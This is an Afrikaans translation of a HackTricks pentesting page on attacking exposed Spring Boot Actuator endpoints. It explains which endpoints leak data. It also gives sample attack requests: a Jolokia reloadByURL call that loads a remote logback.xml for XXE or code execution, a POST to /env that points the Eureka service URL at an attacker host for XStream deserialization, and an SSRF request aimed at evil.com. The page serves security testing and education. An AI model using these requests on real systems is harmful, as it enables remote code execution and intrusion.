Spring Actuators

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Spring Auth Bypass

Vanaf https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Kyk na die oorspronklike pos vanaf [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Kernpunte:

  • Spring Boot Actuators registreer eindpunte soos /health, /trace, /beans, /env, ens. In weergawes 1 tot 1.4 is hierdie eindpunte toeganklik sonder verifikasie. Vanaf weergawe 1.5 aan, is slegs /health en /info nie sensitief standaard nie, maar ontwikkelaars skakel hierdie sekuriteit dikwels af.

  • Sekere Actuator-eindpunte kan sensitiewe data blootstel of skadelike aksies toelaat:

  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, en /heapdump.

  • In Spring Boot 1.x word actuators geregistreer onder die hoof-URL, terwyl dit in 2.x onder die /actuator/ basispad is.

Uitbuitingstegnieke:

  1. Verre Kode-uitvoering via '/jolokia':

  • Die /jolokia actuator-eindpunt stel die Jolokia-biblioteek bloot, wat HTTP-toegang tot MBeans moontlik maak.

  • Die reloadByURL-aksie kan uitgebuit word om logkonfigurasies vanaf 'n eksterne URL te herlaai, wat kan lei tot blinde XXE of Verre Kode-uitvoering via saamgestelde XML-konfigurasies.

  • Voorbeeld-uitbuiting-URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

  1. Konfigurasiewysiging via '/env':

  • As Spring Cloud Biblioteke teenwoordig is, laat die /env eindpunt die wysiging van omgewings-eienskappe toe.

  • Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream deserialisasie-kwesbaarheid in die Eureka serviceURL.

  • Voorbeeld-uitbuiting POST-versoek:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Ander Nuttige Instellings:

  • Eienskappe soos spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, en spring.datasource.tomcat.max-active kan gemanipuleer word vir verskeie uitbuitings, soos SQL-inspuiting of die verandering van databasisverbindingsreekse.

Addisionele Inligting:

  • 'n Omvattende lys van verstek actuators kan hier gevind word hier.

  • Die /env eindpunt in Spring Boot 2.x gebruik JSON-formaat vir eienskapsverandering, maar die algemene konsep bly dieselfde.

Verwante Onderwerpe:

  1. Env + H2 RCE:

  • Besonderhede oor die uitbuiting van die kombinasie van /env eindpunt en H2-databasis kan hier gevind word hier.

  1. SSRF op Spring Boot deur Onkorrekte Padnaaminterpretasie:

  • Die hantering van matriksparameters (;) in HTTP-padname deur die Spring-raamwerk kan uitgebuit word vir Bedienerkant Aanvraagvervalsing (SSRF).

  • Voorbeeld-uitbuitingsversoek:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated